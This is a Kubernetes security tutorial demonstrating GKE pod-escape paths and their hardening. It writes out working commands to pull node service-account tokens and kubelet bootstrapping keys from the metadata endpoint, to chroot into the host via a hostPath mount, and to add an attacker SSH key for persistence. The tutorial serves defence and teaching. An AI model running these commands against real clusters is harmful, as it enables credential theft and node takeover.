How to prevent multiple paths of Kubernetes pod escape

Ryle Zhou
Feb 20 · 10 min read

This tutorial demonstrates some of the security concerns of a default GKE cluster configuration and the corresponding hardening measures to prevent multiple paths of pod escape and cluster privilege escalation. These attack paths are relevant in the following scenarios:

  1. An application flaw in an external facing pod that allows for Server-Side Request Forgery (SSRF) attacks.
  2. A fully compromised container inside a pod allowing for Remote Command Execution (RCE).
  3. A malicious internal user or an attacker with a set of compromised internal user credentials with the ability to create/update a pod in a given namespace.

This lab was created by GKE Helmsman engineers to help you gain a better understanding of how to harden default GKE cluster configurations.

The example code for this lab is provided as-is, without warranty or guarantee.

Create a simple GKE cluster

Start by setting an environment variable for the zone where the cluster will run:

export MY_ZONE=us-central1-a

Run this to start a Kubernetes cluster managed by Kubernetes Engine named simplecluster and configure it to run 2 nodes:

gcloud container clusters create simplecluster --zone $MY_ZONE --num-nodes 2 --metadata=disable-legacy-endpoints=false

It takes several minutes to create a cluster as Kubernetes Engine provisions virtual machines for you. The warnings about features available in new versions can be safely ignored for this lab.

After the cluster is created, check your installed version of Kubernetes using the kubectl version command:

kubectl version

The gcloud container clusters create command automatically authenticated kubectl for you.
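
You can also confirm from the command line that both nodes registered with the cluster:

kubectl get nodes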

View your running nodes in the Cloud Console. On the Navigation menu, click Compute Engine > VM Instances.

Your Kubernetes cluster is now ready for use.

Run a Google Cloud-SDK pod

Launch an interactive pod using the Google Cloud SDK container image:

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

This will take a few minutes to complete.

You should now have a bash shell inside the pod’s container:

root@gcloud:/#

Explore the Legacy Compute Metadata Endpoint

Run the following command to access the “Legacy” Compute Metadata endpoint without requiring a custom HTTP header to get the Compute Engine Instance name where this pod is running:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/name

Now, re-run the same command, but instead use the v1 Compute Metadata endpoint:

curl -s http://metadata.google.internal/computeMetadata/v1/instance/name

Notice how it returns an error stating that it requires the custom HTTP header to be present. Add the custom header on the next run and retrieve the Compute Engine instance name that is running this pod:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name

Without requiring a custom HTTP header when accessing the Compute Engine Instance Metadata endpoint, a flaw in an application that allows an attacker to trick the code into retrieving the contents of an attacker-specified web URL could provide a simple method for enumeration and potential credential exfiltration. By requiring a custom HTTP header, the attacker needs to exploit an application flaw that allows them to control the URL and also add custom headers in order to carry out this attack successfully.
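
To make the risk concrete, the same legacy endpoint also serves a short-lived OAuth access token for the node's service account without any custom header, which is exactly what an SSRF payload would target (shown here for illustration only):

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token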

Keep this shell inside the pod available for the next step. If you accidentally exit from the pod, simply re-run:

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

Explore the GKE node bootstrapping credentials

Run the following command to list the metadata attributes attached to the underlying Compute Engine instance:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/

Perhaps the most sensitive data in this listing is kube-env. It contains several variables which the kubelet uses as initial credentials when attaching the node to the GKE cluster. The variables CA_CERT, KUBELET_CERT, and KUBELET_KEY contain this information and are therefore considered sensitive to non-cluster administrators.

To see the potentially sensitive variables and data, run the following command:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env

Therefore, in any of the following situations:

  1. A flaw that allows for SSRF in a pod application
  2. An application or library flaw that allows for RCE in a pod
  3. An internal user with the ability to create or exec into a pod

There exists a high likelihood for compromise and exfiltration of sensitive kubelet bootstrapping credentials via the Compute Metadata endpoint. With the kubelet credentials, it is possible to leverage them in certain circumstances to escalate privileges to that of cluster-admin and therefore have full control of the GKE Cluster including all data, applications, and access to the underlying nodes.
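
As a rough sketch of how those credentials could be extracted from inside the pod (this assumes the attribute values are base64-encoded PEM blobs; exact variable names can vary by GKE version):

# fetch kube-env and decode the bootstrapping credentials it contains
curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env > kube-env.txt
grep '^CA_CERT' kube-env.txt | awk '{print $2}' | base64 -d > apiserver-ca.crt
grep '^KUBELET_CERT' kube-env.txt | awk '{print $2}' | base64 -d > kubelet.crt
grep '^KUBELET_KEY' kube-env.txt | awk '{print $2}' | base64 -d > kubelet.key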

Leverage the Permissions Assigned to this Node Pool’s Service Account

Run the following curl command to list the OAuth scopes associated with the service account attached to the underlying Compute Engine instance:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes

The combination of authentication scopes and the permissions of the service account dictates what applications on this node can access. The above list is the minimum scopes needed for most GKE clusters, but some use cases require increased scopes.

If the authentication scope were to be configured during cluster creation to include https://www.googleapis.com/auth/cloud-platform, this would allow any Google Cloud API to be considered "in scope", and only the IAM permissions assigned to the service account would determine what can be accessed. If the default service account is in use and the default IAM Role of Editor was not modified, this effectively means that any pod on this node pool has Editor permissions to the Google Cloud project where the GKE cluster is deployed. As the Editor IAM Role has a wide range of read/write permissions to interact with resources in the project such as Compute instances, Cloud Storage buckets, GCR registries, and more, this is most likely not desired.
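
To see what that means in practice, you can fetch an access token for the node's service account from inside the pod and inspect the scopes it carries. The tokeninfo endpoint is used here purely as an illustration, and this assumes python3 is available in the image (it ships with the Cloud SDK):

TOKEN=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | python3 -c 'import sys, json; print(json.load(sys.stdin)["access_token"])')
curl -s "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=${TOKEN}"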

Exit out of this pod by typing:

exit

Deploy a pod that mounts the host filesystem

To demonstrate this, run the following to create a Pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath
spec:
  containers:
  - name: hostpath
    image: google/cloud-sdk:latest
    command: ["/bin/bash"]
    args: ["-c", "tail -f /dev/null"]
    volumeMounts:
    - mountPath: /rootfs
      name: rootfs
  volumes:
  - name: rootfs
    hostPath:
      path: /
EOF

Run kubectl get pod and re-run until it's in the "Running" state:

kubectl get pod

(Output)

NAME       READY   STATUS    RESTARTS   AGE
hostpath   1/1     Running   0          30s

Explore and compromise the underlying host

Start an interactive shell inside the hostpath pod:

kubectl exec -it hostpath -- bash

Switch the pod shell’s root filesystem to that of the underlying host:

chroot /rootfs /bin/bash

Nearly every operation that the root user can perform is available to this pod shell. This includes persistence mechanisms like adding SSH users/keys, running privileged docker containers on the host outside the view of Kubernetes, and much more.
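
A minimal sketch of what that looks like, assuming the node image ships Docker (the default GKE runtime at the time); exact paths and binaries depend on the node OS image:

# run from inside the chroot; these commands act on the node itself
docker ps                                        # list every container on the node, outside Kubernetes' view
cat /etc/passwd                                  # enumerate host users
echo "ssh-rsa AAAA... attacker" >> /root/.ssh/authorized_keys   # illustrative persistence only; placeholder key, path varies by node image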

To exit the pod shell, run exit twice - once to leave the chroot and another to leave the pod's shell:

exit
exit

Now you can delete the hostpath pod:

kubectl delete pod hostpath

Understand the available controls

  • Disable the Legacy Compute Engine Metadata API Endpoint — By specifying a custom metadata key and value, the v1beta1 metadata endpoint is no longer available from the instance.
  • Enable Metadata Concealment — By passing an additional configuration during cluster and/or node pool creation, a lightweight proxy is installed on each node that forwards requests to the Metadata API and prevents access to sensitive endpoints.
  • Enable and configure PodSecurityPolicy — Configuring this option on a GKE cluster adds the PodSecurityPolicy admission controller, which can be used to restrict the use of insecure settings during Pod creation. In this demo’s case, that means preventing containers from running as the root user and from mounting the underlying host filesystem (see the combined example after this list).
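
These controls are applied step by step in the rest of this lab, but they can also be combined at cluster creation time. A sketch using the beta gcloud surface used elsewhere in this lab (flag names may differ in newer releases; hardened-cluster is just an illustrative name):

gcloud beta container clusters create hardened-cluster \
  --zone $MY_ZONE \
  --num-nodes 2 \
  --metadata disable-legacy-endpoints=true \
  --workload-metadata-from-node=SECURE \
  --enable-pod-security-policy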

Deploy a second node pool

Note: In GKE versions 1.12 and newer, the --metadata=disable-legacy-endpoints=true setting is enabled automatically. The next command defines it explicitly for clarity.

Create the second node pool:

gcloud beta container node-pools create second-pool --cluster=simplecluster --zone=$MY_ZONE --num-nodes=1 --metadata=disable-legacy-endpoints=true --workload-metadata-from-node=SECURE

Run a Google Cloud-SDK pod

This time, launch the pod with overrides that schedule it onto second-pool and run it as the unprivileged user 65534:

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never --overrides='{ "apiVersion": "v1", "spec": { "securityContext": { "runAsUser": 65534, "fsGroup": 65534 }, "nodeSelector": { "cloud.google.com/gke-nodepool": "second-pool" } } }' -- bash

You should now have a bash shell inside the pod’s container running on the node pool named second-pool. You should see the following:

nobody@gcloud:/$

It may take a few seconds for the container to be started and the command prompt to be displayed.

If you don’t see a command prompt, try pressing enter.
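
As a quick check, confirm that the securityContext override took effect and the shell is running as the unprivileged nobody user (uid 65534):

id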

Explore various blocked endpoints

First, verify that the legacy v1beta1 metadata endpoint is no longer available:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/name

(Output)

...snip...
Legacy metadata endpoints are disabled. Please use the /v1/ endpoint.
...snip...

With the second node pool configured with --workload-metadata-from-node=SECURE, the following command to retrieve the sensitive kube-env attribute will now fail:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env

(Output)

This metadata endpoint is concealed.

But other commands to non-sensitive endpoints will still succeed if the proper HTTP header is passed:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name

(Example Output)

gke-simplecluster-second-pool-8fbd68c5-gzzp

Exit out of the pod:

exit

You should now be back in Cloud Shell.

Deploy PodSecurityPolicy objects

First, grant your own user account cluster-admin privileges; these are needed to create the policy and RBAC objects in the following steps:

kubectl create clusterrolebinding clusteradmin --clusterrole=cluster-admin --user="$(gcloud config list account --format 'value(core.account)')"

(Output)

clusterrolebinding.rbac.authorization.k8s.io/clusteradmin created

Next, create a more restrictive PodSecurityPolicy that you will bind to all authenticated users in the default namespace:

cat <<EOF | kubectl apply -f -
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: restrictive-psp
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: 'docker/default'
    apparmor.security.beta.kubernetes.io/allowedProfileNames: 'runtime/default'
    seccomp.security.alpha.kubernetes.io/defaultProfileName: 'docker/default'
    apparmor.security.beta.kubernetes.io/defaultProfileName: 'runtime/default'
spec:
  privileged: false
  # Required to prevent escalations to root.
  allowPrivilegeEscalation: false
  # This is redundant with non-root + disallow privilege escalation,
  # but we can provide it for defense in depth.
  requiredDropCapabilities:
  - ALL
  # Allow core volume types.
  volumes:
  - 'configMap'
  - 'emptyDir'
  - 'projected'
  - 'secret'
  - 'downwardAPI'
  # Assume that persistentVolumes set up by the cluster admin are safe to use.
  - 'persistentVolumeClaim'
  hostNetwork: false
  hostIPC: false
  hostPID: false
  runAsUser:
    # Require the container to run without root privileges.
    rule: 'MustRunAsNonRoot'
  seLinux:
    # This policy assumes the nodes are using AppArmor rather than SELinux.
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'MustRunAs'
    ranges:
    # Forbid adding the root group.
    - min: 1
      max: 65535
  fsGroup:
    rule: 'MustRunAs'
    ranges:
    # Forbid adding the root group.
    - min: 1
      max: 65535
EOF

(Output)

podsecuritypolicy.extensions/restrictive-psp created

Next, add the ClusterRole that provides the necessary ability to "use" this PodSecurityPolicy.

cat <<EOF | kubectl apply -f -
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: restrictive-psp
rules:
- apiGroups:
  - extensions
  resources:
  - podsecuritypolicies
  resourceNames:
  - restrictive-psp
  verbs:
  - use
EOF

(Output)

clusterrole.rbac.authorization.k8s.io/restrictive-psp created

Finally, create a RoleBinding in the default namespace that allows any authenticated user permission to leverage the PodSecurityPolicy.

cat <<EOF | kubectl apply -f -
---
# All authenticated users in the default namespace
# can 'use' the 'restrictive-psp' PSP
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: restrictive-psp
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: restrictive-psp
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:authenticated
EOF

(Output)

rolebinding.rbac.authorization.k8s.io/restrictive-psp created

Note: In a real environment, consider replacing the system:authenticated group in the RoleBinding with the specific users or service accounts that should be able to create pods in the default namespace.
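
For example, a tighter binding scoped to a single service account might look like the following (app-deployer is a hypothetical service account name used purely for illustration):

cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: restrictive-psp-app-deployer
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: restrictive-psp
subjects:
- kind: ServiceAccount
  name: app-deployer        # hypothetical service account
  namespace: default
EOF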

Enable PodSecurityPolicy

gcloud beta container clusters update simplecluster --zone $MY_ZONE --enable-pod-security-policy
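
Enabling the admission controller triggers a cluster update that can take several minutes. Once it finishes, you can confirm the policy object created earlier is in place:

kubectl get podsecuritypolicy restrictive-psp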

Deploy a blocked pod that mounts the host filesystem

First, create a new service account named demo-developer to simulate a less-privileged user:

gcloud iam service-accounts create demo-developer

(Output)

Created service account [demo-developer].

Next, grant the service account permission to interact with the cluster and attempt to create pods:

MYPROJECT=$(gcloud config list --format 'value(core.project)')
gcloud projects add-iam-policy-binding "${MYPROJECT}" --role=roles/container.developer --member="serviceAccount:demo-developer@${MYPROJECT}.iam.gserviceaccount.com"

Obtain the service account credentials file by running:

gcloud iam service-accounts keys create key.json --iam-account "demo-developer@${MYPROJECT}.iam.gserviceaccount.com"

Configure kubectl to authenticate as this service account:

gcloud auth activate-service-account --key-file=key.json

To configure kubectl to use these credentials when communicating with the cluster, run:

gcloud container clusters get-credentials simplecluster --zone $MY_ZONE

Now, try to create another pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath
spec:
  containers:
  - name: hostpath
    image: google/cloud-sdk:latest
    command: ["/bin/bash"]
    args: ["-c", "tail -f /dev/null"]
    volumeMounts:
    - mountPath: /rootfs
      name: rootfs
  volumes:
  - name: rootfs
    hostPath:
      path: /
EOF

The output confirms that the pod creation is blocked by the PodSecurityPolicy:

Error from server (Forbidden): error when creating "STDIN": pods "hostpath" is forbidden: unable to validate against any pod security policy: [spec.volumes[0]: Invalid value: "hostPath": hostPath volumes are not allowed to be used]

Deploy another pod that meets the criteria of the restrictive-psp:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath
spec:
  securityContext:
    runAsUser: 1000
    fsGroup: 2000
  containers:
  - name: hostpath
    image: google/cloud-sdk:latest
    command: ["/bin/bash"]
    args: ["-c", "tail -f /dev/null"]
EOF

(Output)

pod/hostpath created

To view the annotation that gets added to the pod indicating which PodSecurityPolicy authorized the creation, run:

kubectl get pod hostpath -o=jsonpath="{ .metadata.annotations.kubernetes\.io/psp }"

(Output appended to the Cloud Shell command line)

restrictive-psp
